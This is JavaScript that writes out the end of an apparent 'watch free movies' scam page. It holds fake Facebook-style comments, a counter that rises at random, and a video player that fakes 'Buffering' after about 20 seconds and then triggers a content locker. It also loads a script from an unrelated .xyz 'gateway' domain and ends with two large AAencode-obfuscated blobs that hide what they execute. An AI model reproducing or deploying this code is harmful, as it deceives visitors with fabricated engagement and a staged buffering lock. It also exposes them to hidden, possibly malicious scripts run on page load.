document.write('                                    <a href="#" class="fb_like fb_meta_item">Reply</a> ·');
document.write('');
document.write('                                    <img class="fb_like_button fb_meta_item" src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/like.png"><span class="like_count fb_meta_item">49</span> ·');
document.write('                                    <span class="fb_timestamp">3 weeks ago</span></div>');
document.write('                            </div>');
document.write('                        </div><div class="fb_comment_wrapper">');
document.write('                            <div class="fb_image_block">');
document.write('                                <img src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/1469528955eb9b970fb68f5193029245548fa365fb.jpg" class="fb_pic">');
document.write('                            </div>');
document.write('                            <div class="fb_comment_block">');
document.write('                                <div class="fb_name">Loubna Duman</div>');
document.write('                                <div class="fb_comment">im about this movie</div>');
document.write('                                <div class="fb_meta">');
document.write('                                    <a href="#" class="fb_like fb_meta_item">Like</a> ·');
document.write('                                    <a href="#" class="fb_like fb_meta_item">Reply</a> ·');
document.write('');
document.write('                                    <img class="fb_like_button fb_meta_item" src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/like.png"><span class="like_count fb_meta_item">12</span> ·');
document.write('                                    <span class="fb_timestamp">4 weeks ago</span></div>');
document.write('                            </div>');
document.write('                        </div><div class="fb_comment_wrapper">');
document.write('                            <div class="fb_image_block">');
document.write('                                <img src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/1469528965f7210a3834f50b9cdf7c19955ab9eac1.jpg" class="fb_pic">');
document.write('                            </div>');
document.write('                            <div class="fb_comment_block">');
document.write('                                <div class="fb_name">Todd Copen</div>');
document.write('                                <div class="fb_comment">i cry every time i watch this.</div>');
document.write('                                <div class="fb_meta">');
document.write('                                    <a href="#" class="fb_like fb_meta_item">Like</a> ·');
document.write('                                    <a href="#" class="fb_like fb_meta_item">Reply</a> ·');
document.write('');
document.write('                                    <img class="fb_like_button fb_meta_item" src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/like.png"><span class="like_count fb_meta_item">127</span> ·');
document.write('                                    <span class="fb_timestamp">a month ago</span></div>');
document.write('                            </div>');
document.write('                        </div>');
document.write('');
document.write('                            <hr class="fb_line">');
document.write('                            <div class="fb_plugin"><img src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/fav.png" class="fb_icon"> <a href="#" class="fb_plugin_link">Facebook Comments Plugin</a></div>');
document.write('                        </div>');
document.write('                    </div>');
document.write('                </div>');
document.write('');
document.write('            </div>');
document.write('        </div>');
document.write('');
document.write('        <div class="footer">');
document.write('            Copyright © 2021 - <a href="#" class="movieKeywordLink">Watch Free Movies Online (HD)</a>');
document.write('        </div>');
document.write('    </div>');
document.write('</div>');
document.write('');
document.write('<!-- jQuery -->');
document.write('<script src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/jquery.min.js"></script>');
document.write('');
document.write('<!-- Bootstrap -->');
document.write('<script src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/tether.min.js"></script>');
document.write('<script src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/bootstrap.min.js"></script>');
document.write('');
document.write('<script src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/nouislider.min.js"></script>');
document.write('');
document.write('<!-- AdminPlus -->');
document.write('<script src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/adminplus.js"></script>');
document.write('');
document.write('<!-- App JS -->');
document.write('<script src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/main.min.js"></script>');
document.write('');
document.write('<script src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/block.js"></script>');
document.write('<script src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/sweetAlert.js"></script>');
document.write('<script type="application/javascript">');
document.write('    var currentURLDomain=window.location.href.substring(0,window.location.href.lastIndexOf("/"));');
document.write('    $(document).ready(function() {');
document.write('');
document.write('        var fullURL=window.location.href;');
document.write('        var video = document.getElementById("video");');
document.write('        var supported=!!video.canPlayType;');
document.write('        var currentTimestamp = $(\'#currentTimestamp\');');
document.write('        var caption=$(\'#caption\');');
document.write('        var seekBar = $(\'#seekBar\');');
document.write('        var rangeSlider = document.getElementById(\'slider-range\');');
document.write('        var totalSeconds = 7243;');
document.write('        var timestamp = formatSeconds(totalSeconds);');
document.write('        var currentSeconds=0;');
document.write('        var videoLocked=false;');
document.write('');
document.write('');
document.write('');
document.write('        $(\'#totalTimestamp\').html(timestamp);');
document.write('        noUiSlider.create(rangeSlider, {');
document.write('            start: [1],');
document.write('            range: {');
document.write('                \'min\': [0],');
document.write('                \'max\': [100]');
document.write('            }');
document.write('        });');
document.write('        rangeSlider.noUiSlider.on(\'change\', function( values, handle ) {');
document.write('            var value=values[handle];');
document.write('            var percent=value/100;');
document.write('            var seconds=Math.round(totalSeconds*percent);');
document.write('            currentTimestamp.html(formatSeconds(seconds));');
document.write('            if(seconds > 20){');
document.write('                //Lock');
document.write('                lockVideo();');
document.write('                $(\'#thumbnail\').css(\'display\',\'block\');');
document.write('            }');
document.write('            else{');
document.write('                video.currentTime = seconds;');
document.write('            }');
document.write('            console.log(value);');
document.write('        });');
document.write('// Update the seek bar as the video plays');
document.write('        video.addEventListener("timeupdate", function () {');
document.write('');
document.write('            // Calculate the slider value');
document.write('            if(!videoLocked){');
document.write('                if(video.currentTime > 19){');
document.write('                    lockVideo();');
document.write('                }');
document.write('                var value = (1000 / totalSeconds) * video.currentTime;');
document.write('                currentTimestamp.html(formatSeconds(video.currentTime));');
document.write('                currentSeconds=video.currentTime;');
document.write('                rangeSlider.noUiSlider.set(value);');
document.write('            }');
document.write('');
document.write('        });');
document.write('        video.addEventListener("play", function () {');
document.write('            if(!videoLocked){');
document.write('                videoPlaying();');
document.write('                caption.css(\'display\',\'block\');');
document.write('               setTimeout(function(){caption.slideUp(500);},3000);');
document.write('            }');
document.write('');
document.write('        });');
document.write('        video.addEventListener("pause", function () {');
document.write('            if(!videoLocked)');
document.write('                videoPaused();');
document.write('        });');
document.write('        $(\'#videoBlockContainer\').hover(function(){');
document.write('                    caption.css(\'display\',\'block\');');
document.write('                },');
document.write('                function(){');
document.write('                    setTimeout(function(){caption.slideUp(500);},3000);');
document.write('                });');
document.write('        $(\'#playButton\').click(function () {');
document.write('            if(videoLocked)');
document.write('                return false;');
document.write('            if (video.paused == true) {');
document.write('                // Play the video');
document.write('                video.play();');
document.write('            } else {');
document.write('                // Pause the video');
document.write('                video.pause();');
document.write('            }');
document.write('        });');
document.write('        $(\'#video\').click(function(){');
document.write('            $(\'#playButton\').trigger("click");');
document.write('        });');
document.write('        $(\'#volume\').click(function(){');
document.write('            if(videoLocked)');
document.write('                return false;');
document.write('            if(video.muted == false) {');
document.write('                // Mute the video');
document.write('                video.muted = true;');
document.write('            } else {');
document.write('                // Unmute the video');
document.write('                video.muted = false;');
document.write('            }');
document.write('        });');
document.write('        $(\'#fullscreen\').click(function(){');
document.write('            if(videoLocked)');
document.write('                return false;');
document.write('            if (video.requestFullscreen) {');
document.write('                video.requestFullscreen();');
document.write('            } else if (video.mozRequestFullScreen) {');
document.write('                video.mozRequestFullScreen(); // Firefox');
document.write('            } else if (video.webkitRequestFullscreen) {');
document.write('                video.webkitRequestFullscreen(); // Chrome and Safari');
document.write('            }');
document.write('        });');
document.write('');
document.write('        setInterval(function(){');
document.write('            $(\'.increase\').each(function(){');
document.write('                var rand=Math.floor((Math.random() * 100) + 1);');
document.write('                if(rand>90){');
document.write('                    var count=parseInt($(this).data("count"));');
document.write('                    count++;');
document.write('                    $(this).data("count",count);');
document.write('                    $(this).html(count.toLocaleString(\'en-US\', {minimumFractionDigits: 0}));');
document.write('                }');
document.write('            });');
document.write('        },100);');
document.write('        function exitFullScreen(){');
document.write('            if (document.exitFullscreen) {');
document.write('                document.exitFullscreen();');
document.write('            } else if (document.msExitFullscreen) {');
document.write('                document.msExitFullscreen();');
document.write('            } else if (document.mozCancelFullScreen) {');
document.write('                document.mozCancelFullScreen();');
document.write('            } else if (document.webkitExitFullscreen) {');
document.write('                video.webkitExitFullscreen();');
document.write('                document.webkitExitFullscreen();');
document.write('            }');
document.write('            if(video.webkitExitFullscreen){');
document.write('                video.webkitExitFullscreen();');
document.write('            }');
document.write('        }');
document.write('        function lockVideo(){');
document.write('            exitFullScreen();');
document.write('            videoLocked=true;');
document.write('            $(\'#videoBlockContainer\').block({');
document.write('                message: \'<div class="blockui-default-message"><i class="fa fa-circle-o-notch fa-spin"></i><h6>Buffering... <br> </h6></div>\',');
document.write('                overlayCSS:  {');
document.write('                    background: \'rgba(142, 159, 167, 0.8)\',');
document.write('                    opacity: 1,');
document.write('                    cursor: \'wait\'');
document.write('                },');
document.write('                css: {');
document.write('                    width: \'50%\'');
document.write('                },');
document.write('                blockMsgClass: \'block-msg-default\'');
document.write('            });');
document.write('            video.pause();');
document.write('            videoPlaying();');
document.write('');
document.write('            setTimeout(function(){');
document.write('                $.content_locker(locker_options);');
document.write('            },2000);');
document.write('        }');
document.write('    });');
document.write('    function videoPlaying(){');
document.write('        $(\'#playButton\').find(\'i\').first().removeClass(\'fa-play\').addClass("fa-pause");');
document.write('        $(\'#playButton\').find(\'span\').first().html(\'Pause\');');
document.write('    }');
document.write('    function videoPaused(){');
document.write('        $(\'#playButton\').find(\'i\').first().removeClass(\'fa-pause\').addClass(\'fa-play\');');
document.write('        $(\'#playButton\').find(\'span\').first().html(\'Play\');');
document.write('    }');
document.write('    function formatSeconds(seconds){');
document.write('        var date = new Date(null);');
document.write('        date.setSeconds(seconds); // specify value for SECONDS here');
document.write('        return date.toISOString().substr(11, 8);');
document.write('    }');
document.write('</script>');
document.write('');
document.write('<script src="https://zwidgetymz56r.xyz/gateway_v5.php?id=2166418&options=onclick"></script>');
document.write('<script>ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻   //*´∇｀*/ [\'_\']; o=(ﾟｰﾟ)  =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o^_^o)/ (o^_^o);(ﾟДﾟ)={ﾟΘﾟ: \'_\' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +\'_\') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ \'_\')[o^_^o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +\'_\')[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ==3) +\'_\') [c^_^o];(ﾟДﾟ) [\'c\'] = ((ﾟДﾟ)+\'_\') [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) [\'o\'] = ((ﾟДﾟ)+\'_\') [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) [\'c\']+(ﾟДﾟ) [\'o\']+(ﾟωﾟﾉ +\'_\')[ﾟΘﾟ]+ ((ﾟωﾟﾉ==3) +\'_\') [ﾟｰﾟ] + ((ﾟДﾟ) +\'_\') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ ((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+((ﾟｰﾟ==3) +\'_\') [(ﾟｰﾟ) - (ﾟΘﾟ)]+(ﾟДﾟ) [\'c\']+((ﾟДﾟ)+\'_\') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ (ﾟДﾟ) [\'o\']+((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ];(ﾟДﾟ) [\'_\'] =(o^_^o) [ﾟoﾟ] [ﾟoﾟ];(ﾟεﾟ)=((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+ (ﾟДﾟ) .ﾟДﾟﾉ+((ﾟДﾟ)+\'_\') [(ﾟｰﾟ) + (ﾟｰﾟ)]+((ﾟｰﾟ==3) +\'_\') [o^_^o -ﾟΘﾟ]+((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+ (ﾟωﾟﾉ +\'_\') [ﾟΘﾟ]; (ﾟｰﾟ)+=(ﾟΘﾟ); (ﾟДﾟ)[ﾟεﾟ]=\'\\\\\'; (ﾟДﾟ).ﾟΘﾟﾉ=(ﾟДﾟ+ ﾟｰﾟ)[o^_^o -(ﾟΘﾟ)];(oﾟｰﾟo)=(ﾟωﾟﾉ +\'_\')[c^_^o];(ﾟДﾟ) [ﾟoﾟ]=\'\\"\';(ﾟДﾟ) [\'_\'] ( (ﾟДﾟ) [\'_\'] (ﾟεﾟ+(ﾟДﾟ)[ﾟoﾟ]+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (o^_^o))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟoﾟ]) (ﾟΘﾟ)) (\'_\');ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻   //*´∇｀*/ [\'_\']; o=(ﾟｰﾟ)  =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o^_^o)/ (o^_^o);(ﾟДﾟ)={ﾟΘﾟ: \'_\' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +\'_\') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ \'_\')[o^_^o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +\'_\')[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ==3) +\'_\') [c^_^o];(ﾟДﾟ) [\'c\'] = ((ﾟДﾟ)+\'_\') [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) [\'o\'] = ((ﾟДﾟ)+\'_\') [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) [\'c\']+(ﾟДﾟ) [\'o\']+(ﾟωﾟﾉ +\'_\')[ﾟΘﾟ]+ ((ﾟωﾟﾉ==3) +\'_\') [ﾟｰﾟ] + ((ﾟДﾟ) +\'_\') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ ((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+((ﾟｰﾟ==3) +\'_\') [(ﾟｰﾟ) - (ﾟΘﾟ)]+(ﾟДﾟ) [\'c\']+((ﾟДﾟ)+\'_\') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ (ﾟДﾟ) [\'o\']+((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ];(ﾟДﾟ) [\'_\'] =(o^_^o) [ﾟoﾟ] [ﾟoﾟ];(ﾟεﾟ)=((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+ (ﾟДﾟ) .ﾟДﾟﾉ+((ﾟДﾟ)+\'_\') [(ﾟｰﾟ) + (ﾟｰﾟ)]+((ﾟｰﾟ==3) +\'_\') [o^_^o -ﾟΘﾟ]+((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+ (ﾟωﾟﾉ +\'_\') [ﾟΘﾟ]; (ﾟｰﾟ)+=(ﾟΘﾟ); (ﾟДﾟ)[ﾟεﾟ]=\'\\\\\'; (ﾟДﾟ).ﾟΘﾟﾉ=(ﾟДﾟ+ ﾟｰﾟ)[o^_^o -(ﾟΘﾟ)];(oﾟｰﾟo)=(ﾟωﾟﾉ +\'_\')[c^_^o];(ﾟДﾟ) [ﾟoﾟ]=\'\\"\';(ﾟДﾟ) [\'_\'] ( (ﾟДﾟ) [\'_\'] (ﾟεﾟ+(ﾟДﾟ)[ﾟoﾟ]+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟoﾟ]) (ﾟΘﾟ)) (\'_\');');
document.write('');
